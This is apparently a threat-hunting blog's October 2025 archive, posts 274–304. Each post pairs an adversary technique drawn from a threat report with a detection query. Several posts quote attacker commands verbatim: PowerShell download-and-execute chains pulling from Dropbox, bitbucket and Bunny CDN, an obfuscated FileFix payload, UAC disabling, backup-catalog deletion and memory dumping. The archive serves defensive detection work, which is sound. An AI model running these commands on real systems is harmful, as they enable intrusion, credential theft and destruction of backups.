Posts

Showing posts from October, 2025

304. Adversaries Abuse Microsoft Windows Resource Leak Diagnostic Tool for Dumping Memory

Hello everyone! It's not always LSASS: in some cases adversaries create full memory dumps and use them to access credentials. In this case, the adversary leveraged the Microsoft Windows Resource Leak Diagnostic tool to obtain a memory dump:

rdrleakdiag /p [REMOVED] /o CSIDL_PROFILE\downloads /fullmemdmp /wait 1

Let's build a query:

event_type: "processcreatewin" AND proc_file_path: "rdrleakdiag.exe" AND cmdline: "fullmemdmp"

See you tomorrow!

303. Hunting for Replication Through Removable Media

Hello everyone! It may not be very common, but some adversaries still use infected USB devices for malware distribution, so today we'll look at an example of Replication Through Removable Media (T1091). The example is Tangerine Turkey. The adversary leverages infected USB devices to distribute cryptocurrency-mining malware. So, the infection starts with executing a malicious VBScript from a USB drive:

C:\WINDOWS\System32\WScript.exe E:\rootdir\x817994.vbs

It means we can hunt for suspicious scripts executed from external drives, for example, D:\, E:\ and F:\. Let's build the query:

event_type: "processcreatewin" AND proc_file_path: "wscript.exe" AND cmdline: ("d\\\:" OR "e\\\:" OR "f\\\:")

See you tomorrow!

302. Hunting for CVE-2025-59287 Exploitation

Hello everyone! I think you've already heard about a vulnerability in Microsoft's Windows Server Update Services (WSUS). Today we'll talk about Exploit Public-Facing Application (T1190) and CVE-2025-59287. So, the vulnerability is already actively exploited in the wild (ITW). According to this report, successful exploitation leads to spawning command and scripting interpreters from wsusservice.exe and w3wp.exe. Here we have the first part of our detection opportunities. The first one:

event_type: "processcreatewin" AND proc_file_path: ("cmd.exe" OR "powershell.exe") AND proc_p_file_path: "wsusservice.exe"

The second:

event_type: "processcreatewin" AND proc_file_path: ("cmd.exe" OR "powershell.exe") AND proc_p_file_path: "w3wp.exe" AND proc_p_cmdline: "wsuspool"

Also, the adversary leveraged a PowerShell payload to exfiltrate data to a webhook.site endpoint. And this is another detection opportun...

301. Qilin Abuses Cyberduck for Exfiltration

Hello everyone! Let's talk about data exfiltration trends and ransomware. Modern ransomware attacks almost always involve this stage, so it's important to document the tools they use to solve this task. According to this report, Qilin ransomware affiliates often abuse Cyberduck for data exfiltration. It's a legitimate open source file transfer client that enables an adversary to connect to remote servers and cloud storage services to upload, download, and manage files. As always, we can build hunts based on the executable's metadata, for example:

event_type: "processcreatewin" AND proc_file_productname: "cyberduck"

Also, we can look for resolution of Cyberduck-related domains, for example:

event_type: "dnsreqwin" AND dns_rname: "cyberduck.io"

See you tomorrow!

300. Same Name, Wrong Path

Hello everyone! We've talked about how adversaries masquerade malicious files a few times already, but let's look at another curious case of COM Hijacking (T1546.015). By adding a malicious entry under HKCU that points a CLSID to their DLL, attackers cause normal system processes to load that malicious DLL. In this case, the adversary overrode the CLSID for twinapi.dll ({AA509086-5Ca9-4C25-8F95-589D3C07B48A}), forcing system processes and web browsers to load the attacker's DLL. We can hunt for twinapi.dll being loaded from uncommon locations:

event_type: "imageloadwin" AND file_name: "twinapi.dll" AND NOT file_path: ("windows\\system32" OR "windows\\syswow64")

See you tomorrow!

299. That's How Adversaries Abuse the BCP Utility

Hello everyone! Today we'll look at a curious example of Deobfuscate/Decode Files or Information (T1140), and learn how ransomware affiliates abuse the Bulk Copy Program (BCP). The example is the Trigona ransomware gang, which also uses Mimic ransomware in their campaigns. So, the adversary often targets MS-SQL Server instances and leverages bcp.exe to export the toolset to the compromised server, for example:

bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\spd.exe" -T -f "C:\ProgramData\FODsOZKgAU.txt"
bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\AD.exe" -T -f "C:\ProgramData\FODsOZKgAU.txt"
bcp "select binaryTable from uGnzBdZbsi" queryout "C:\users\[username]\music\L.bat" -T -f "C:\users\[username]\music\FODsOZKgAU.txt"
bcp "select binaryTable from uGnzBdZbsi" queryout "C:\users\[username]\music\pci2.exe" -T -f "C:\users\[users name]\music\FODsOZKgAU.txt"

For example, we can hunt for bcp.exe exporting files to suspicious folders:

event_ty...

298. Hunting for Abusing Dropbox for Malware Delivery

Hello everyone! Let's look at another example of how financially motivated adversaries leverage legitimate web services to deliver malware. A financially motivated threat cluster (tracked as UNC6229) based in Vietnam is using fake job postings to target workers in digital advertising and marketing. The attackers post convincing job listings on legitimate job platforms and sometimes on domains they set up themselves. The adversary leveraged malicious LNK files, which abused PowerShell to download a payload from Dropbox:

PowerShell -WindowStyle Hidden -Command "Iex (irm 'hxxps://xkc1ffaq1b.dl.dropboxusercontent[.]com/scl/fi/e/0?rlkey=5lf9n8l2v6xmqpmnmqltf3s38')"

For example, we can hunt for PowerShell with Dropbox-related domains among its command line arguments:

event_type: "processcreatewin" AND proc_file_path: "powershell.exe" AND cmdline: *dropboxusercontent*

See you tomorrow!

297. Hunting for Python Telegram RAT

Hello everyone! It's not always PowerShell (T1059.001) or Windows Command Shell (T1059.003); more and more often adversaries use alternatives, for example, Python (T1059.006). Netskope discovered a new Python RAT that leverages the Telegram Bot API as a command and control (C2) channel. The RAT is executed via pythonw.exe:

pythonw.exe C:\Users\User\AppData\Local\Temp\_MEI96282\telegrambt.py

For example, we can hunt for pythonw.exe accessing api[.]telegram[.]org:

event_type: "dnsreqwin" AND dns_rname: "api.telegram.org" AND proc_file_path: "pythonw.exe"

See you tomorrow!

296. Hunting for Caminho Loader Behaviors

Hello everyone! Today we'll look at a few examples of behaviors related to Caminho Loader, which employs Least Significant Bit (LSB) steganography to conceal .NET payloads within image files hosted on legitimate platforms. For example, according to the report, the adversary leveraged malicious JS files to download the second-stage script from paste[.]ee. We can transform it into a hunting query and look for wscript.exe attempts to connect to paste[.]ee:

event_type: "dnsreqwin" AND dns_rname: "paste.ee" AND proc_file_path: "wscript.exe"

The next stage, a heavily obfuscated PowerShell script, downloads a steganographic image file from archive[.]org. This behavior can also be easily transformed into a hunting query:

event_type: "dnsreqwin" AND dns_rname: "archive.org" AND proc_file_path: "powershell.exe"

Check the report for more detection and hunting opportunities! See you tomorrow!

295. Hunting for Phantom DLL Hijacking

Hello everyone! Adversaries always want to masquerade malicious files to make them look legitimate. In some cases it may enable them to persist as well. Let's look at an example of Hijack Execution Flow: DLL (T1574.001). For example, adversaries may leverage phantom DLL hijacking by targeting references to non-existent DLL files. Let's look at the report on PassiveNeuron. The threat actors placed malicious DLLs under the following paths:

C:\Windows\System32\wlbsctrl.dll
C:\Windows\System32\TSMSISrv.dll
C:\Windows\System32\oci.dll

If present on the system, the first two DLLs are loaded into the svchost.exe process, and the other one is loaded into msdtc.exe. For example, we can hunt for file creation events related to these DLLs:

event_type: "filecreatewin" AND file_path: "windows\\system32" AND file_name: ("wlbsctrl.dll" OR "tsmsisrv.dll" OR "oci.dll")

See you tomorrow!

294. Hunting for Suspicious DLL Export Functions

Hello everyone! I've noted a few times that one of my favorite threat hunting targets is rundll32.exe. And there's another interesting point about it: export functions. In many cases DLL export functions may be very interesting and suspicious, and may be worth documenting. Let's look at an example: NOROBOT. The adversary delivered it via the ClickFix technique. The victim should have executed the following command:

rundll32.exe \\inspectguarantee[.]org\check\iamnotarobot.dll,humanCheck

As you can see, it has a very interesting export function name: "humanCheck". Why not use it to build a query?

event_type: "processcreatewin" AND proc_file_path: "rundll32.exe" AND cmdline: "humancheck"

See you tomorrow!

293. That's How APT-Q-37 Abuses C# Compiler

Hello everyone! As you know, adversaries may deliver malicious files to victims as uncompiled code. So today we'll look at an example of Obfuscated Files or Information: Compile After Delivery (T1027.004). According to the report, APT-Q-37 leveraged malicious XLAM files. The macro in the file decodes a copy of the backdoor source code written in C# and saves it as C:\programdata\cayote.log. Then csc.exe is used to compile it as C:\Programdata\USOShared\vlcplayer.dll:

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /r:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Net.Http.dll" /target:library /out:C:\Programdata\USOShared\vlcplayer.dll "C:\Programdata\cayote.log"

For example, we can look for suspicious csc.exe executions compiling a DLL under the ProgramData folder:

event_type: "processcreatewin" AND proc_file_path: "csc.exe" AND cmdline: ("target:library" AND "programdata")

See you t...

292. Hunting for PhantomVAI Loader's Behaviors

Hello everyone! Today we'll look at PhantomVAI Loader, and various related behavior markers we can transform into hunting queries. Let's start with the delivery stage. The adversary distributed archives with malicious JS or VBS files via spear phishing emails. We can hunt for wscript.exe executing files from folders related to user downloads, for example:

event_type: "processcreatewin" AND proc_file_path: "wscript.exe" AND cmdline: ("downloads" OR "content.outlook")

It executes the following PowerShell command to download the next stage:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$disjoined = '[redacted]' -replace '','';$isogonism = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($disjoined));Invoke-Expression $isogonism;"

Here, for example, we can look for decoding:

event_type: "processcreatewin" AND proc_file_path: "pow...

291. Adversaries Keep Abusing Microsoft Console Debugger

Hello everyone! Today we'll look at how adversaries abuse the Microsoft Console Debugger, and how it may help you during the threat identification phase. And we'll look at Jewelbug. This threat actor has been known to use this utility for quite some time, and as it's not very popular among adversaries, it may also help you to identify the group. It's also interesting that the adversary uses a renamed version of the tool, for example:

CSIDL_PROFILE\public\downloads\7zup.exe -d -remote up

The tool can be used to run shellcode, executables, DLLs, or terminate security solutions. For example, we can hunt for renamed executables:

event_type: "processcreatewin" AND proc_file_originalfilename: "cdb.exe" AND NOT proc_file_path: "cdb.exe"

See you tomorrow!

290. That's How Adversaries Use PowerShell for Mutex Detection

Hello everyone! Let's focus on the Defense Evasion tactic today, and look at the following sub-technique: Execution Guardrails: Mutual Exclusion (T1480.002). According to this report, StealthStealer runs the following PowerShell command to determine whether an instance with the same name is already running by checking a mutex:

cmd /C "powershell -Command \"$mutex = New-Object System.Threading.Mutex($false, 'Global\d170db549434063c1ef596e29256736216a1013f86088454b97ce25857d93247'); if($mutex.WaitOne(0)) { exit 0 } else { exit 1 }\""

As always, we can search for similar behavior markers:

event_type: "processcreatewin" AND proc_file_path: "powershell.exe" AND cmdline: "system.threading.mutex"

See you tomorrow!

289. Hunting for Masquerading

Hello everyone! We've already talked about interesting staging folders, but today we'll look at another similar thing we can use for hunting: Masquerading: Match Legitimate Resource Name or Location (T1036.005). As always, let's start with an example. The adversary leveraged PowerShell scripts to download and run malicious files. For example, such files were saved under the following names and locations:

C:\ProgramData\Intel\ping.exe
C:\Users\Public\ping.exe

As you can see, the threat actors masqueraded malicious files to look like the ping utility. You can document such cases and use them for both detection and hunting, for example:

event_type: "processcreatewin" AND proc_file_path: "ping.exe" AND NOT proc_file_path: ("windows\\system32" OR "windows\\syswow64")

See you tomorrow!

288. ClickFix, FileFix... So What?

Hello everyone! ClickFix, FileFix... We see it every day. But what does it mean from a detection perspective? Let's look at an example. FileFix. The victim should paste the following command:

PowerShell -noP -W H -ep Bypass -C "$if=[System.IO.File];$ifr=$if::ReadAllBytes;$ifw=$if::WriteAllBytes;$e=[System.Text.Encoding]::UTF8;$c=[System.Convert];$egb=$e.GetBytes;$egs=$e.GetString;$cf=$c::FromBase64String;$ct=$c::ToBase64String;$u='hxxps[://]bitbucket[.]org/pibejiloiza/pi73/raw/4e2ff4d859e04af8d01fd961ab56163736a731f9/pexels-willianmatiola-33593998-3[.]jpg';$egs.Invoke($cf.Invoke('JHBfZmlzdD0tam9pbigkZW52OlRFTVAsJ1x6ZDc0NmYxY2UxYzAuanBnJyk7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkdSAtTWV0aG9kIEdldCAtT3V0RmlsZSAkcF9maXN0IC1FcnJvckFjdGlvbiBJZ25vcmU7CiRpbWFnZV9ieXRlcz0kaWZyLkludm9rZSgkcF9maXN0KTskcF9ieXRlcz0kaW1hZ2VfYnl0ZXNbMTEwMTI1My4uKCRpbWFnZV9ieXRlcy5MZW5ndGgtMSldOyRlLkdldFN0cmluZygkcF9ieXRlcyl8aWV4Ow=='))|iex;$z=' C:\\Users\\Default\\Documents\\Meta\\Facebook\\Shar...

287. Adversaries Abuse Dpaste to Store Malicious Files

Hello everyone! Yes, one more legitimate web service is used by adversaries to store malicious files. But it's always a detection or hunting opportunity for us! So, according to this report, the adversary used a malicious PowerShell script to download a TXT file from dpaste[.]com. We can easily translate this behavior into a hunting query:

event_type: "dnsreqwin" AND dns_rname: "dpaste.com" AND proc_file_path: "powershell.exe"

See you tomorrow!

286. That's How Astaroth Abuses GitHub

Hello everyone! I know you've got a bit tired of legitimate services abuse, but it's always a great target for threat hunting, so it's important to document it and add it to your library. This time we'll look at how Astaroth leveraged GitHub for storing its configuration. What's more, it's stored inside an image, for example:

hxxps://raw.githubusercontent[.]com//dridex2024//razeronline//refs/heads/main/razerlimpa[.]png

So, we can look for suspicious processes accessing raw.githubusercontent[.]com. For example, in this case the payload was injected into the RegSvc.exe process:

event_type: "dnsreqwin" AND dns_rname: "raw.githubusercontent.com" AND proc_file_path: "RegSvc.exe"

See you tomorrow!

285. That's How Stealit Hides PowerShell Window

Hello everyone! Adversaries often hide command and scripting interpreters' windows to use such tools silently. Today we'll look at a creative way of implementing Hide Artifacts: Hidden Window (T1564.003). Let's look at Stealit. To hide the PowerShell window the malware leverages the following command:

"powershell.exe -NoProfile -Command " Add-Type -Name Window -Namespace Console -MemberDefinition ' [DllImport(\"Kernel32.dll\")] public static extern IntPtr GetConsoleWindow(); [DllImport(\"user32.dll\")] public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow); '; $consolePtr = [Console.Window]::GetConsoleWindow(); [Console.Window]::ShowWindow($consolePtr, 0); ""

Interesting, right? And definitely worth a query:

event_type: "processcreatewin" AND proc_file_path: "powershell.exe" AND cmdline: ("GetConsoleWindow" AND "ShowWindow")

See you tomorrow!

284. That's How WhatsApp Worm Disables UAC

Hello everyone! How often do you see adversaries leverage Spearphishing via Service (T1566.003)? Not very often, right? So let's look at an example. We'll look into a report on WhatsApp Worm. Yes, the threat actors distributed malicious files, in this case ZIP archives with LNK files, via WhatsApp. The LNK file contained an obfuscated command to download and run the second stage. Let's look at how this stage disables UAC. The following command is used to achieve this goal:

powershell -WindowStyle Hidden -ArgumentList "-Command Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'EnableLUA' -Value 0 -Force"

Such activity is quite suspicious and definitely worth a query:

event_type: "registryvaluesetwin" AND reg_key_path: "enablelua" AND reg_value_data: "0x00000000"

See you tomorrow!

283. That's How Ransomware Gangs Abuse Wbadmin

Hello everyone! Today we'll look at an example of Inhibit System Recovery (T1490), and how adversaries abuse wbadmin. And no, not for deleting shadow copies. Let's look at Chaos ransomware behaviors. It uses vssadmin and wmic to remove shadow copies, bcdedit to change recovery settings, and wbadmin to delete the backup catalog:

wbadmin delete catalog -quiet

Of course, you can look for such suspicious activity:

event_type: "processcreatewin" AND proc_file_path: "wbadmin.exe" AND cmdline: ("delete" AND "catalog")

See you tomorrow!

282. Here's Another RMM You Most Likely Don't Detect

Hello everyone! Unfortunately, RMMs are still a very common tool in adversaries' hands. Of course, some are very common and easily detectable, but others... Let's look at an example. According to the Huntress report, an adversary leveraged the Nezha agent. It's a lightweight, open-source server monitoring and task management tool that is freely available. Although the agent doesn't seem to have interesting command line arguments or metadata, we can always look inside to extract notable strings, for example to write YARA rules. For such legitimate tools it's usually not very difficult. Of course, this binary contains some interesting strings, for example:

nezhahq
NezhaServiceClient

Another good candidate for hunting, right? See you tomorrow!

281. Adversaries Abuse Bunny.net CDN

Hello everyone! We've talked about how adversaries abuse various legitimate services to distribute malware multiple times already. But let's look at another example. According to this report, the adversary leveraged a malicious LNK file to launch a hidden PowerShell command that downloads a lure PDF and another ZIP file from a Bunny CDN URL:

powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "try { iwr 'hxxps://555555cnd.b-cdn[.]net/Marriott_Marketing_Job_Description.pdf' -OutFile 'C:\Users\Public\Marriott.pdf'; Start-Process 'C:\Users\Public\Marriott.pdf'; Start-Sleep -Seconds 3; iwr 'hxxps://555555cnd.b-cdn[.]net/002.zip' -OutFile 'C:\Users\Public\002.zip'; Expand-Archive -Path 'C:\Users\Public\002.zip' -DestinationPath 'C:\Users\Public' -Force; Start-Process 'C:\Users\Public\XtraViewer.exe' -ArgumentList '/silent_start' } catch {}"

Despite the fact the command is quite common and can be ...

280. Hunting for Suspicious TLDs

Hello everyone! We've already looked at how to use parts of URLs in our threat hunting missions; let's look at another similar artefact: TLDs. In some cases adversaries use quite exotic TLDs for their infrastructure. Let's look at a recent example related to Rhadamanthys (yes, again). Most of the domains have quite suspicious TLDs, for example:

cloud341[.]autos
cloud341[.]baby
cloud341[.]icu
cloud341[.]lol
cloud341[.]monster
cloud34221[.]hair
cloud34221[.]homes
cloud34221[.]quest
cloud343[.]boats
cloud9342[.]beauty

Worth a hunting query, right?

event_type: "dnsreqwin" AND dns_rname: (*.autos OR *.baby OR *.icu OR *.lol OR *.monster OR *.hair OR *.homes OR *.quest OR *.boats OR *.beauty)

See you tomorrow!

279. The Confucius Group Uses Malicious PowerPoint Show Files

Hello everyone! I love it when adversaries leverage uncommon file types in their spear phishing campaigns. And I spotted another interesting example today; this time it's a PPSX file. According to the report, the Confucius group used such files in a phishing email campaign targeting users in Pakistan. A PPSX file is a PowerPoint Show file created by Microsoft PowerPoint (or compatible programs like LibreOffice Impress or Google Slides). It's a special type of PowerPoint file that opens directly in slideshow mode rather than in edit mode. It's not very common, so it may be a good idea to hunt for any suspicious files with this extension:

event_type: "processcreatewin" AND proc_file_path: "powerpnt.exe" AND cmdline: *ppsx

See you tomorrow!

278. Hunting for Suspicious XLL Files

Hello everyone! Adversaries keep experimenting with the file types they use for phishing. And this time we'll look at UAC-0245 and XLL files. According to the report, the adversary leveraged malicious XLL files to deliver CABINETRAT. Such files had some very interesting behaviors. For example, the file created another XLL file in "%APPDATA%\Microsoft\Excel\XLSTART\", enabling the adversary to use Office Template Macros (T1137.001) for persistence. First of all, we can hunt for any suspicious XLL files:

event_type: "processcreatewin" AND cmdline: *.xll

Another detection opportunity is to look for suspicious XLL file creation events related to the XLSTART folder:

event_type: "filecreatewin" AND file_path: "xlstart" AND file_extension: "xll"

See you tomorrow!

277. Adversaries Abuse a Free Request Logging Service as C2

Hello everyone! Today we'll talk about another interesting example of a legitimate web service which is misused by threat actors as a C2 channel. This time it's a free request logging service. According to the Proofpoint report, TA415 leveraged requestrepo[.]com in order to exfiltrate collected system information as well as the VS Code Remote Tunnel verification code. The threat actors used WhirlCoil, a Python loader, which was executed via pythonw.exe. We can use both facts to build a hunting query:

event_type: "dnsreqwin" AND dns_rname: "requestrepo.com" AND proc_file_path: "pythonw.exe"

See you tomorrow!

276. Hunting for Suspicious IIS Modules

Hello everyone! Let's talk about another uncommon technique, Server Software Component: IIS Components (T1505.004), and how to hunt for the installation of suspicious modules. According to the report, UAT-8099 leveraged appcmd.exe to install and uninstall IIS modules:

c:\windows\System32\inetsrv\appcmd.exe uninstall module /module.name:HttpFastCgiModule
c:\windows\SysWOW64\inetsrv\appcmd.exe install module /name:HttpCgiModule /image:%windir%\SysWOW64\inetsrv\HttpCgiModule.dll /preCondition:bitness32

This behavior can be transformed into a hunting query:

event_type: "processcreatewin" AND proc_file_path: "appcmd.exe" AND cmdline: ("module" AND ("install" OR "uninstall"))

See you tomorrow!

275. Hunting for Suspicious URLs

Hello everyone! How often do you use proxy logs for threat hunting? I hope often enough, as C2 communications may involve accessing quite interesting URLs. Let's look at a few examples! The first one is related to an activity cluster we track as Watch Wolf. If you look at the example, you can see that the malware accesses the following URL:

hxxps://4ad74aab[.]cfd/index.php

Of course, even the domain itself is quite suspicious, including the TLD, but the URL also contains "index.php", so we can use both to create a hunting query. Another example: Rhadamanthys. And another suspicious URL, of course:

hxxps://193.84.71[.]81/gateway/wcm6paht.htbq1

Here we also have an interesting part for building a hunting query: "gateway". See you tomorrow!

274. That's How Phantom Taurus Abuses Exchange Management Shell

Hello everyone! I hope you've already checked Unit42's report on Phantom Taurus. And today we'll look at how this cluster abused the Exchange Management Shell for email collection. According to the first report on Phantom Taurus, the adversary leveraged the Exchange Management Shell (exshell.psc1) to collect selected emails and save them to CSV:

powershell.exe -psconsolefile "C:\Program files\microsoft\exchange server\v15\bin\exshell.psc1" -command "get-mailbox -Filter \"UserPrincipalName -Like \"*foreign*\"\" -ResultSize Unlimited | get-mailboxstatistics | sort-object TotalItemSize -Descending | Select-Object DisplayName,Alias,TotalItemSize -First 30 | export-csv c:\users\public\<redacted>\<redacted>.csv"

powershell.exe -psconsolefile "C:\Program files\microsoft\exchange server\v15\bin\exshell.psc1" -command "Get-MessageTrackingLog -ResultSize Unlimited | Where-Object {$_.Recipients -like \"*@<redacte...